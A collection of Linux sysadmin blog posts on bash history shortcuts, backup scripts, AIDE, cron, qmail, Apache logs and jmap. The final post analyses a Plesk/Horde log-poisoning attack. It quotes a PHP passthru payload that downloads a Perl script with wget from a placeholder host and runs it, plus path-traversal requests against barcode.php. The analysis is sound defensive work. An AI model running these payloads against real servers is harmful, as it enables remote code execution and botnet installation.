Linux: Execute previous command and replace program name

Sometimes you execute a command and then need to execute it again, just with a different program, e.g.:

cat /etc/hosts
vi /etc/hosts

Of course you can just press the up arrow to get back to the previous line, press CTRL-A to get to the beginning of the line, delete three characters and write vi instead of cat. But there is a better way: you can just execute the previous command with a search and replace:

cat /etc/hosts
!!:s/cat/vi

It will replace cat with vi and execute the following:

vi /etc/hosts

You can do the same thing by executing the following:

^cat^vi

If all you want to replace is the command itself, you can also do it this way:

vi !!:*

It will execute vi with all arguments used for the previous command.

If all you’re after is the last argument of the previous command, you can also use the Alt-. keyboard shortcut. It takes the last argument of the previous command and inserts it on the command line. So you can write vi, press Alt-. (Alt-Dot) and you will get “vi /etc/hosts”. If the previous command was the following:

cat /etc/hosts /etc/hosts.allow

You’d get:

vi /etc/hosts.allow

All this is also useful if you typed a long command line and misspelled something, e.g. cta instead of cat, as shown below.
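
For example:

cta /etc/hosts
^cta^cat

Note that ^cta^cat (like !!:s/cta/cat) only replaces the first occurrence. In bash, you can use !!:gs/old/new to replace all occurrences.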

Linux: Simple incremental backup script

This is a simple script to perform an incremental backup of a directory. It will create a backup folder and, in this folder, subfolders with a timestamp as name. Every file modified since the last backup will be copied (preserving directories, permissions, owner and timestamp). The first time you execute the script, it will just copy all files.

The root for the backup is defined with an environment variable called BACKUP_ROOT. You can set it with the export command:

export BACKUP_ROOT=/mybackup

If it is not set, /tmp/backup will be used as default (but you can change the default in the script itself).

#!/bin/sh

# Check number of parameters
if [ -z "$1" ]
  then
    echo "Usage: $0 <path_to_dir_to_backup>"
    exit 1
fi

# Check whether directory to backup exists
if [ ! -d "$1" ]
  then
    echo "$1 does not exist or is not a directory"
    exit 1
fi

# Use /tmp/backup as default if no backup root is defined
[ -z "$BACKUP_ROOT" ] && BACKUP_ROOT=/tmp/backup

# Create backup root directory if it doesn't exist
[ -d "$BACKUP_ROOT" ] || mkdir -p "$BACKUP_ROOT"

# Move last backup timestamp
[ -f "$BACKUP_ROOT/.new_backup" ] && mv "$BACKUP_ROOT/.new_backup" "$BACKUP_ROOT/.last_backup"

# Create new backup timestamp
touch "$BACKUP_ROOT/.new_backup"

# Generate a new backup folder name
TIME=$(date '+%Y%m%d%H%M%S')
BACKUP_FOLDER="$BACKUP_ROOT/$TIME"

# Create the new backup folder
mkdir "$BACKUP_FOLDER"

# If there was a previous backup, copy only files newer than the last backup timestamp,
# recreating parent paths and preserving permissions, owner and timestamp.
# Otherwise (first backup), copy all files.
if [ -f "$BACKUP_ROOT/.last_backup" ]
  then
    find "$1" -type f -newer "$BACKUP_ROOT/.last_backup" -exec cp -p --parents {} "$BACKUP_FOLDER/" \;
  else
    find "$1" -type f -exec cp -p --parents {} "$BACKUP_FOLDER/" \;
fi

I guess there are enough comments in there so that I do not need to go into details about how the script works but feel free to drop a comment in case you have a question.
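
For example, assuming you saved the script as backup.sh (the name is arbitrary) and made it executable, backing up a directory twice would look like this:

chmod +x backup.sh
export BACKUP_ROOT=/mybackup
./backup.sh /home/user/documents
./backup.sh /home/user/documents

The first run copies all files to a timestamped folder below /mybackup; the second run creates a new timestamped folder containing only the files modified in between.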

Linux: keep track of command execution and its output

Just a short post about how you can keep track of which commands you have executed as well as their output. This is especially useful when you want to document how you performed some task or solved some problem. So it’s a great tool when you write blog posts about such things!

All you have to do is call the script command and provide a path to a file where the output will be logged e.g.:

script /tmp/script.log

From now on, everything will be logged. To stop logging, just type:

exit

The output in the file basically looks like the output on the terminal, but you do not need to worry about the window buffer, the terminal crashing, or forgetting to copy the contents of the terminal window before closing it. An additional benefit of the script command is that it also saves colored output, so if you executed the following:

ls -l --color=always /usr

you would see a colored output when using cat to output the contents of the file:

cat /tmp/script.log

Of course, when using it to write blog posts, one thing still missing is changes made to files using vi or nano. I haven’t yet found a tool for this. One solution would be to have a script calling vi or nano, first saving a copy of the file and producing a diff once you exit the editor…
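
As a starting point, here is a minimal sketch of such a wrapper (the name editlog.sh is made up): it saves a copy of the file, starts the editor and prints a unified diff of your changes when you exit:

#!/bin/sh
# Usage: editlog.sh <file>
FILE="$1"
TMP=$(mktemp)
cp "$FILE" "$TMP"          # keep a copy of the original file
"${EDITOR:-vi}" "$FILE"    # edit the file (vi by default)
diff -u "$TMP" "$FILE"     # show what changed
rm -f "$TMP"

Run inside a script session, the diff output then also ends up in the log.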

Linux: Configure AIDE (Advanced Intrusion Detection Environment)

We upgraded our server to Debian Wheezy and Plesk 11.5 about a week ago and started getting many emails from cron. Luckily I had entered the email address of a colleague as administrator and he got the spam 😉

One of them was this one:

———- Forwarded message ———-
From:
Date: 2013/9/16
Subject: Daily AIDE report for xx-xxxx.myserver.de
To: root@xx-xxxx.myserver.de

This is an automated report generated by the Advanced Intrusion Detection
Environment on xx-xxxx.myserver.de started at 2013-09-16 07:45:17.

******************************************************************************
* The cron job was terminated by a fatal error. *
******************************************************************************

******************************************************************************
* the cron job was interrupted before AIDE could return an exit code. *
******************************************************************************
******************************************************************************
* script errors *
******************************************************************************
Fatal error: The AIDE database '/var/lib/aide/aide.db' does not exist!
This may mean you haven’t created it, or it may mean that someone has removed it.
End of script errors

AIDE produced no errors.

funny, AIDE did not leave a log.

End of AIDE daily cron job at 2013-09-16 07:45, run time 0 seconds

I didn’t know we had AIDE installed but since it was there, it’d make sense to initialize it properly and see whether it works fine. For those of you who do not know AIDE: it is an intrusion detection software which works by checking file and directory integrity. In order to work, AIDE needs to first have a database it can use to then detect changes.

So the first step is to initialize the database. I found a nice article at HowToForge. It looked pretty easy, so I started with the first step, which was to download a sample configuration file:

wget securehostingdirectory.com/aide.conf

And I got a 404 error:

--2013-09-16 20:32:46--  http://securehostingdirectory.com/aide.conf
Resolving securehostingdirectory.com (securehostingdirectory.com)… 69.65.27.131
Connecting to securehostingdirectory.com (securehostingdirectory.com)|69.65.27.131|:80… connected.
HTTP request sent, awaiting response… 404 Not Found
2013-09-16 20:32:47 ERROR 404: Not Found.

Well… it starts fine… So I searched Google for an alternative location but couldn’t find any. Then I thought that there must be some kind of configuration already available, since it was looking for the database at a specific path. So I checked the cron job sending us this nice email:

# grep "aide.conf" /etc/cron.daily/aide
CONFFILE="/var/lib/aide/aide.conf.autogenerated"
# grep aide configuration data from aide config
update-aide.conf

Then opened /var/lib/aide/aide.conf.autogenerated to check the content and saw the following:

#########
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# this file is generated dynamically from /etc/aide/aide.conf and the files
# in /etc/aide/aide.conf.d
# Any changes you make here will be lost.
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
#########

/etc/aide/aide.conf as well as /etc/aide/aide.conf.d were there, and it looks like they were used to generate this file. So I just needed to create the database. I skipped the wget part of the tutorial and went to the next step (Step 2: Initialize the AIDE database):

# nice -19 aide --init --config=/etc/aide/aide.conf

AIDE, version 0.15.1

### AIDE database at /var/lib/aide/aide.db.new initialized.

It was pretty fast (you wish AIDE was actually that fast to initialize…). Then I checked whether AIDE was working properly:

 nice -19 aide -C --config=/etc/aide/aide.conf
Couldn't open file /var/lib/aide/aide.db for reading

Ok, this one is obvious: it has created an aide.db.new file but is actually looking for aide.db, so I just had to rename the file (well, I thought so, because the next step of the tutorial was “cp aide.db.out aide.db.in”):

# mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db
# nice -19 aide -C --config=/etc/aide/aide.conf
Database does not have attr field.
Comparation may be incorrect
Generating attr-field from dbspec
It might be a good Idea to regenerate databases. Sorry.
db_char2line():Error while reading database

OK, so the initialization was actually too fast and didn’t generate a proper database… After googling again, I found out you can initialize AIDE with the following:

aideinit

It then ran for what felt like forever, using a CPU core at about 80 to 100%. It might display a few warnings like:

/run/lock/mailman/master-qrunner.xx-xxxx.myserver.de.8246 mtime in future
/run/lock/mailman/master-qrunner mtime in future

But I wouldn’t worry about them.

Looking at the running processes, I could see that it actually caused aide --init to be called, but with the auto-generated configuration file. I should have realized that this is the configuration I needed to use; otherwise, all rules are missing…

The initialization of AIDE took over an hour. I then made the second mistake: I immediately ran a check, got the same error, assumed that the created database was again not working and restarted an initialization. Only later did I realize that the problem was probably that it created an aide.db.new database and I needed to copy it to aide.db; otherwise, the check would still run with the old database.

After the second initialization and copying the file, I didn’t get the same error again when running the check but a new one:

/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated -C
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
...

The message is not 100% clear (does it mean it expected one and found none, or that it expected one and found two?). I thought it might have something to do with the second initialization: maybe it did not reset the file but just appended to it… So I deleted both db files and tried again:

rm /var/lib/aide/aide.db.new /var/lib/aide/aide.db
aideinit
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db
/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --check

It then looked better and I actually got a list of differences. I now need to go through the list and work out what to add to the exclusion list and other configuration options, to keep everything secure while avoiding unnecessary spam.

Optimize images on Linux and Mac

Most websites have many images. You might not be aware of it, but yours probably does too. I mostly have text and code in my posts and thought I did not need to care too much about optimizing the images in there because there are rarely any. But the fact is that even though my posts mostly do not contain images, the theme I use as well as a few plugins do use images.

If you are using WordPress, you can easily optimize (and compress) images in your posts using a plugin. I’ve used WP Smush.it and EWWW Image Optimizer. First I used WP Smush.it, but at some point it stopped working, so I switched to EWWW Image Optimizer. When WP Smush.it got fixed, I switched back since I felt more comfortable with it.

But these plugins only optimize images in the media library, not images that are part of themes or plugins. Since most images on my site fall into this category, I had to find a solution. I didn’t find a plugin for this, but I did find two nice command line tools.

Why two? Because one of them takes care of PNG files and the other of JPEG files.

First, the PNG files. I optimize them using a command line tool called optipng. You can install it like this under Linux:

apt-get install optipng

(note that you might need to add a sudo before the apt-get)

On Mac, using Homebrew:

brew install optipng

To use the tool, you just need to provide a file to optimize:

optipng myfile.png

If you need to optimize all images in a given folder:

find . -iname "*.png" -exec optipng {} \;

If you want an even better optimization and can live with a very long optimization run, add the -o7 option:

find . -iname "*.png" -exec optipng -o7 {} \;

Now, the JPEG files. For this I used a command line tool called jpegoptim.

Installation under Linux:

apt-get install jpegoptim

On Mac with Homebrew:

brew install jpegoptim

And just provide a file to optimize:

jpegoptim myfile.jpg

For a bulk optimization:

find . -iregex ".*\.jpe?g" -exec jpegoptim {} \;

This performs a lossless optimization (the pixels you see stay exactly the same, but the file gets smaller). So you can already get smaller files without any loss of quality, but if you can live with a lower image quality, you can achieve an even better optimization:

find . -iregex ".*\.jpe?g" -exec jpegoptim --max=75 {} \;

This means you are ready to lose up to 25% quality in order to get smaller files.

Note that you can also optimize images online using Smush.it.

Also remember if you use WordPress that images in plugins and themes will be overwritten by every update of the plugin or theme. So run these two tools once in a while (at least after updating multiple plugins and themes).
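
If you want to run both tools in one go over a whole directory tree (e.g. a WordPress installation), a small wrapper script could look like this (just a sketch; the -iregex syntax is the GNU find one used above):

#!/bin/sh
# Optimize all PNG and JPEG files below the given directory (default: current directory)
DIR="${1:-.}"
find "$DIR" -iname "*.png" -exec optipng {} \;
find "$DIR" -iregex ".*\.jpe?g" -exec jpegoptim {} \;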

Qmail: 30 to 60 seconds connection delay

I’ve noticed that when connecting to port 25 of one of our servers, it took quite a long time until commands could be sent. To test it, you connect using telnet:

telnet xxx.xxx.xxx.xxx 25

Where xxx.xxx.xxx.xxx is the IP address of the server on which the mail server is running.

I saw that the connection was immediately established but it took quite some time for the server to send a 220 response. Before this response is received no commands (e.g. HELO, QUIT…) can be processed. Here’s the sequence in which things happen:

  1. Client attempts to open an SMTP connection to port 25 of the server.
  2. Client waits for the socket connection to be established.
  3. Connection established.
  4. Client waits for protocol to start (i.e. waits for a 220 message).
  5. Server sends a 220 code saying it is ready for action.
  6. Now the client can send commands to the server.

The delay occurs in step 4. It takes a long time until the server sends a 220 code.

What happens in the background is that the server validates that the client is trustworthy. This involves performing a reverse lookup of the IP address and checking for known spammers. This can take some time especially if the reverse lookup results in a timeout.
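
To see whether the reverse lookup itself is the bottleneck, you can time it directly on the server (xxx.xxx.xxx.xxx being the IP address of the connecting client):

time host xxx.xxx.xxx.xxx

If this takes tens of seconds instead of returning (or failing) immediately, the reverse lookup is very likely the cause of the delay.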

Here are a few things you need to do to get rid of this timeout:

First, make sure that the name servers that are listed in /etc/resolv.conf are working properly.

You can check whether the IP from where the client is accessing the server can be reverse resolved. You can check it with:

# host 192.168.1.1
Host 1.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

If you get a “not found” as shown above then it means the name resolution will not work. You might also get the following:

# host 192.168.1.1
;; connection timed out; no servers could be reached

In this case, the reverse lookup times out. You can prevent qmail from performing a reverse lookup by changing the xinetd script used to start qmail. The script is located in /etc/xinetd.d. It’s usually called smtp, or smtp_psa if you’re using Plesk. It looks like this:

service smtp
{
       socket_type     = stream
       protocol        = tcp
       wait            = no
       disable         = no
       user            = root
       instances       = UNLIMITED
       server          = /var/qmail/bin/tcp-env
       server_args     = /usr/sbin/rblsmtpd  -r sbl-xbl.spamhaus.org /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

tcp-env supports the following options:

  • -r: (default) attempt to obtain TCPREMOTEINFO from the remote host.
  • -R: do not attempt to obtain TCPREMOTEINFO from the remote host.
  • -t timeout: give up on the TCPREMOTEINFO connection attempt after timeout seconds. Default: 30.

So we need to use the -R option and could also set the timeout to 0 seconds with the -t0 option:

service smtp
{
       socket_type     = stream
       protocol        = tcp
       wait            = no
       disable         = no
       user            = root
       instances       = UNLIMITED
       server          = /var/qmail/bin/tcp-env
       server_args     = -Rt0 /usr/sbin/rblsmtpd  -r sbl-xbl.spamhaus.org /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

Actually -t0 is redundant when using -R. So you can try with -R and with -Rt0 and see whether it makes any difference on your system.

After changing this, you’ll need to restart xinetd:

/etc/init.d/xinetd restart

If you use inet instead of xinetd then you need to update /etc/inetd.conf instead and restart inetd by using:

/etc/init.d/inetd restart

or:

killall -HUP inetd

Please note that Plesk seems to overwrite this file once in a while, so you might lose this setting.

Even after setting this, I’ve seen that from most servers the delay was gone, but I still had a remaining 30 second delay when connecting to the mail server from my laptop.

The mail server uses the ident/auth protocol to contact the client machine on port 113. Unfortunately, many firewalls are configured to just ignore these requests without answering. In this case, you’ll also have to wait for a timeout to occur before the mail server goes to the next step.

In order to get rid of it, you can configure an iptables rule to actively reject connections from the server to remote port 113, so that you do not have to wait for 30 seconds in case the remote firewall silently ignores the request. Since the request on port 113 is not critical for the functioning of the mail server, it’s safe to prevent it. Execute the following on the server to have these connections rejected by its local firewall:

iptables -A OUTPUT -p TCP --dport 113 -j REJECT --reject-with tcp-reset

Making these few changes made sure that the connection from our other servers was established without delays. And from my laptop I no longer get a fixed 60 or 30 second delay; it mostly takes between 1 and 15 seconds.

If after doing all this it’s still slow, you should check the list of servers used by rblsmtpd. rblsmtpd blocks mail from RBL-listed sites. It uses a list of sources, in my case only sbl-xbl.spamhaus.org. First make sure that all sources are still up and running, since a dead one could also cause an additional timeout (the default timeout is 60 seconds). Additionally, checking whether the client is blacklisted also costs time. So you might want to remove rblsmtpd and its parameters (basically what’s between -Rt0 and /var/qmail/bin/relaylock above) and see whether it’s faster.

Linux: Test crontab

Let’s assume you’ve set up a cron job in crontab and it doesn’t seem to be fired, or doesn’t do what you’d expect it to do.

There are a few things you should check:

  1. Is the cron job properly installed?
  2. Is cron working?
  3. Is the configured command working?
  4. Can cron run the configured command?

Is the cron job properly installed?

List crontabs

The first step is to check whether your cron job is at all installed. You will find useful commands in this previous post.

Check the time definition of the cron job

One issue could be that the time definition of the cron job is not valid or doesn’t trigger the cron job at the time interval you’d expect it to run. Checking this is pretty easy using the CRON tester. Just paste the time definition part in there and press “Test”. It will show you the date and time of the next 10 executions of the job.

If you e.g. paste the following: 1 2 3 * *
You’ll get the following output:

Given the CRON job starting at 2013-07-30 11:30:57 (now), it would run:

    2013-08-03 02:01:00
    2013-09-03 02:01:00
    2013-10-03 02:01:00
    2013-11-03 02:01:00
    2013-12-03 02:01:00
    2014-01-03 02:01:00
    2014-02-03 02:01:00
    2014-03-03 02:01:00
    2014-04-03 02:01:00
    2014-05-03 02:01:00

Is cron working?

The first thing you should do is to check the log files:

grep cron /var/log/messages

The results should look like this:

Jul 29 23:38:01 xxxxxx /usr/sbin/cron[16170]: (root) CMD (/bin/echo "hello" >> /tmp/test.log)

First the date and time of execution, then the hostname, then the path to cron with the process ID of the cron child process, then the user and, after CMD, the command executed.

If you issued crontab with the -l option, you will also see entries like this:

Jul 29 23:43:45 xxxxxx crontab[21081]: (root) LIST (root)

If you do not see anything in there, cron is probably not running properly…
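
You can also check directly whether the cron daemon is running at all (the binary is called cron on Debian-based systems and crond on Red Hat-based ones):

ps aux | grep '[c]ron'

The [c] trick prevents the grep process itself from showing up in the results.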

In order to check whether cron is working, the easiest way is to install a cron job running every minute and giving you some kind of output i.e. either writing a string in a file or displaying a string on open terminals.

Write a string in a file

Install the following cron job (I assume you know how to install it; otherwise you’d probably not have read this far…):

* * * * * /bin/echo "hello" >> /tmp/test.log

This will cause the job to run every minute and will write “hello” to the specified file. Make sure that the user has access to this file. Feel free to place the file somewhere else if required.

Then just sit and relax for a few minutes. After that you should see that the file contains “hello” a few times. This means cron is running and you can just remove this new cron job.

Display a string on open terminals

This can be done using the wall command. This command takes a file as parameter and prints the contents of this file to all open terminals. Alternatively, if no file is specified, it will print the standard input to all terminals. That’s the way we’ll do it. We’ll echo a string and redirect it to wall:

* * * * * /bin/echo "hello" | /usr/bin/wall

You should then see the following displayed every minute:

Broadcast Message from root@xxxxxx
        (/dev/pts/0) at 11:38 ...

hello

Before installing it, please first check the location of wall on your system (on mine it is in /usr/bin):

# which wall
/usr/bin/wall

If it works, you can just remove the new cron job.

Is the configured command working?

To check whether the command is working properly, you can just execute it from a shell. Of course the user and the environment might be different. In order to really test the script in a real cron environment, please refer to this previous post.
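
One simple trick to compare the environments (a sketch; values containing spaces would need additional quoting) is to let cron dump its environment to a file:

* * * * * env > /tmp/cron_env.txt

Once the file has been written, remove the job again and run your command with exactly that environment instead of your shell’s:

env - $(cat /tmp/cron_env.txt) /home/user/bin/myscript.sh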

Can cron run the configured command?

If cron can run the configured command, you should first be able to see in /var/log/messages that it is being executed. If that is the case and you still do not get the expected results, you should check the rights on the script or executable being called.

Also a good way to find out what happens is to redirect the output of the called command to some file e.g.:

0 0 * * * /home/user/bin/myscript.sh >> /home/logs/mylog.log 2>&1

This will cause all output of the script to be redirected to the specified file. If you happen to call this command manually as a different user, keep in mind that the log file will then belong to that user and the cron job might no longer be able to write to it. If that is the case, just delete the log file created during the manual test or update its permissions.

Linux: Apache logs

Location

The Apache web server log files contain all errors found while serving requests as well as records of all incoming requests. The location of the log files is configurable. By default they are stored in one of these directories, depending on the Linux distribution:

  • /var/log/httpd
  • /var/log/apache2
  • sometimes directly in /var/log
  • /usr/local/apache/log

The exact location of the log files is configured in the apache2.conf or httpd.conf configuration file. Here’s where you should look for it:

  • /etc/apache2/httpd.conf
  • /usr/local/etc/apache2/httpd.conf
  • /etc/httpd/conf/httpd.conf

To find the location of the error log file, open the apache configuration file and search for ErrorLog. Alternatively you can use grep to get the information without having to open the file in an editor:

# grep ^ErrorLog /etc/apache2/httpd.conf
ErrorLog /var/log/apache2/error_log

Replace /etc/apache2/httpd.conf by the actual location of the apache configuration file.

The access log file, containing the records of all incoming requests, is usually stored in the same location. To get its name, you usually just have to replace error by access in the path to the error log file.

You can also get the actual location of the access log file using grep:

# grep ^CustomLog /etc/apache2/httpd.conf
CustomLog /var/log/apache2/access_log combined

Format

The “combined” after the log file path means that the “combined” log format should be used. The other log format you can use is the “common” log format. Both of them are pretty similar. The common log format will store the following information on each line:

  • IP address of the client
  • identity of the client
  • user ID
  • time that the server finished processing the request
  • method used (e.g. GET) and requested resource
  • status code sent back to the client
  • size of the object returned to the client

Additionally, the combined log format will also store the following information:

  • site the client has been referred from
  • User-Agent

Graceful restart

A graceful restart will instruct the web server to reopen the log files for new requests. When you rename the log files, Apache will continue writing to the renamed files. By performing a graceful restart, you cause Apache to reopen the log files at the configured path and write new requests to the new files. Requests being processed at the time of the graceful restart will still be logged to the renamed files. So after a graceful restart, you will need to wait for all pending requests to be processed before you can work on the renamed log files (e.g. compress them).

Here’s a short example:

mv /var/log/apache2/access_log /var/log/apache2/access_log.save
mv /var/log/apache2/error_log /var/log/apache2/error_log.save
/usr/sbin/apache2ctl -k graceful

The pending requests will be logged to access_log.save and error_log.save and new requests to access_log and error_log.

Note that instead of /usr/sbin/apache2ctl you might have to use one of the following:

  • /usr/sbin/apachectl
  • /usr/sbin/httpd2
  • /usr/local/apache2/bin/apachectl

Also, if it complains about the arguments, try executing it without -k, i.e. with only graceful as the command line argument.

Log rotation

Using a graceful restart, you can manually rotate logs (or rotate them with a cron job), but there’s an even nicer solution: you can use piped logs. Piped logs just means that the web server writes log entries through a pipe to another process instead of directly to the files. This way you can redirect the log output to rotatelogs, which will create new log files on a regular basis.

Instead of:

CustomLog /var/log/apache2/access_log combined

configure the following:

CustomLog "|/usr/sbin/rotatelogs2 /var/log/apache2/access_log 86400" combined

86400 is the number of seconds after which the log file should be rotated (in this case 24 hours).
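
If you prefer log file names containing a date instead of the seconds-since-epoch suffix rotatelogs appends by default, you can embed strftime placeholders in the file name (supported by current rotatelogs versions):

CustomLog "|/usr/sbin/rotatelogs2 /var/log/apache2/access_log.%Y-%m-%d 86400" combined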

Instead of /usr/sbin/rotatelogs2 you might have to use one of the following paths:

  • /usr/sbin/rotatelogs
  • /usr/local/apache/bin/rotatelogs
  • /usr/local/sbin/rotatelogs

Other log files

There are also other log files created by the Apache web server or its modules. They are usually stored in the same location as the error and access logs. Some of them are:

  • ScriptLog: log for mod_cgi, records input to and output from CGI scripts
  • RewriteLog: log for mod_rewrite, records how requests are transformed by the rewrite rules
  • JkLogFile: log for mod_jk, records the communication between Tomcat and Apache

jmap: Could not reserve enough space for object heap

If you get the following error message when using jmap to get a Java heap dump:

# $JAVA_HOME/bin/jmap -dump:file=/tmp/dump.hprof PID
Error occurred during initialization of VM
Could not reserve enough space for object heap
Could not create the Java virtual machine.

it’s due to the default heap size used by the server VM, so you just need to set values for the -Xmx and -Xms parameters. With jmap, you need to prefix them with -J, which means the parameter is passed to the underlying JVM:

 # $JAVA_HOME/bin/jmap -F -J-Xms16m -J-Xmx128m -dump:file=/tmp/dump.hprof 24613
Attaching to process ID 24613, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 20.4-b02
Dumping heap to /tmp/dump.hprof ...
Finding object size using Printezis bits and skipping over...
...
Finding object size using Printezis bits and skipping over...
Heap dump file created

If you create multiple files, it makes sense to have a timestamp in the filename e.g.:

 # $JAVA_HOME/bin/jmap -F -J-Xms16m -J-Xmx128m -dump:file=/tmp/dump.`date '+%Y%m%d%H%M%S'`.hprof 24613
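
If you do not know the process ID of the JVM you want to dump, the jps tool shipped with the JDK lists all running Java processes together with their main class or jar:

# $JAVA_HOME/bin/jps -l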

Plesk Exploit: Readable Logfile Vulnerability

A vulnerability scan was performed on one of our servers at the beginning of the month. It lasted about 4 days and was looking for vulnerable versions of the Plesk control panel in order to use the Horde/IMP Plesk webmail exploit. Let’s have a look at how this looks in a few log files:

First the attacker is checking which version of Horde is installed:

access_log:xx.xxx.xx.xxx - - [01/Jun/2013:15:05:42 +0200] "GET /horde/services/help/?show=about HTTP/1.1" 200 3326 "-" "HTTP_Request2/0.5.2 (http://pear.php.net/package/http_request2) PHP/5.2.11"

If it finds a suitable version of Horde, it will go to the next steps:

access_log:xx.xxx.xx.xxx - - [01/Jun/2013:15:38:39 +0200] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

Here, the attacker sends a POST request to /horde/imp/redirect.php including some PHP code as the username. It usually uses the passthru PHP function, which executes an external program. The PHP code usually looks like this:

passthru('cd /tmp;wget http://xxx/yyy.txt;perl yyy.txt;rm -f yyy.txt');

It basically always does the same thing:

  1. Go to the tmp directory
  2. Download a PERL script
  3. Execute the script
  4. Delete the script

There are a few variations:

  • The commands are executed using passthru, system, shell_exec or exec
  • The script is downloaded using wget, curl, fetch, GET, lwp-download or lynx
  • The downloaded file is a file with the .txt extension or has an image file extension and is renamed before being executed
  • Sometimes, the attacker also messes with the history so that you do not see what exactly happened

There are even scripts which try many of the combinations above, just in case some of them do not work on a particular system.

This PHP code is written to the Horde log file. It is then executed by exploiting a vulnerability in barcode.php (or rather a vulnerability in Image.php, which is called by barcode.php). In the access log, this looks like this:

access_log:xx.xxx.xx.xxx - - [04/Jun/2013:15:38:41 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

It will most probably also try different log file locations e.g.:

access_log:xx.xxx.xx.xxx - - [04/Jun/2013:15:38:40 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

In many cases, the PERL scripts will just install some additional PERL scripts used for DDOS attacks in your /var/www/vhosts/xxx/cgi-bin directories. You can find such scripts using:

find /var/www/vhosts/[a-z]*/cgi-bin/*.pl

In order to protect your system, you should always install all Plesk security updates. This vulnerability is very old but seems to still be worth exploiting. There is also a fix for Image.php which can be downloaded here.
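
Since the exploit relies on PHP code being written to the Horde log file and then included through barcode.php, it can also be worth searching the log for PHP execution functions (adjust the log path to one of the locations seen in the requests above):

grep -E "passthru\(|shell_exec\(|system\(|exec\(" /var/log/psa-horde.log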

Note that the PERL scripts stored in your vhost folders are often well commented and you will find such comments in there:

#part of the Gootkit ddos system

Nice, isn’t it? 😉